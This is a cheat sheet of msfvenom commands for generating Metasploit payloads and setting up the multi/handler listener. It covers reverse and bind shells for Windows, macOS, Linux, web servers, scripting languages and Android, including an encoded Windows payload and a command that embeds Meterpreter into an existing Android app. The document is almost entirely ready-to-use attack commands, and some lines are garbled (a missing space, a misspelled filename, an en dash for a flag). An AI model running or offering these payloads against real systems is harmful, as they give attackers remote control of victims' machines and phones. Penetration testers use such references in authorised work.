MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
Metasploit Payload Listener
msfconsole
use exploit/multi/handler
set [payload-name]
set [ip-address]
set [port]
Run
Windows Payloads
Windows Meterpreter Reverse Shell:
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Reverse Shell:
msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Encoded Meterpreter Reverse Shell:
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe
Windows Meterpreter Reverse Shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
MacOS Payloads
macOS Bind Shell:
msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho
macOS Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho
macOS Reverse TCP Shellcode:
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform
Linux Payloads
Linux Meterpreter TCP Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind TCP Shell:
msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind Meterpreter TCP Shell:
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Meterpreter Reverse Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
Web-based Payloads
PHP Meterpreter Reverse Shell:
msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php
JSP Java Meterpreter Reverse Shell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp
ASP Meterpreter Reverse Shell:
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp
WAR Reverse TCP Shell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war
Script-Based Payloads
Perl Unix Reverse shell:
msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl
Bash Unix Reverse Shell:
msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh
Python Reverse Shell:
msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py
Android Payloads
Android Meterpreter reverse Payload:
msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk
Android Embed Meterpreter Payload:
msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk